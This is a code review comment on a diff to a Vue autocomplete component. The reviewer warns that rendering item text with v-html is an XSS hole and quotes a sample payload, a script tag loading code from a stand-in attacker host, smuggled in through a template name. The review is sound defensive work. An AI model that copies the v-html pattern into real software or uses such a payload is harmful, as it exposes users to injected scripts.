frontend/src/components/form/base/EAutocomplete.vue

```diff
@@ -12,16 +12,33 @@
   >
     <v-autocomplete
       v-bind="$attrs"
+      :search-input.sync="search"
       :filled="filled"
       :hide-details="hideDetails"
       :error-messages="veeErrors.concat(errorMessages)"
       :label="labelOrEntityFieldLabel"
       :class="[inputClass]"
       :readonly="readonly"
       :append-icon="readonly ? null : '$dropdown'"
-      :filter="filter"
+      :filter="tokensFilter"
       v-on="$listeners"
     >
+      <template #item="{ item, on, attrs }">
+        <v-list-item v-bind="attrs" v-on="on">
+          <v-list-item-content>
+            <v-list-item-title>
+              <span v-html="renderHighlighted(item.text)" />
```

Comment:
Using v-html here is a security vulnerability. Even with a 32 character limit, an attacker who gained access to the camp where the PBS checklist templates are defined can rename one of them as: `Bas<script src="evil.com/x.js">`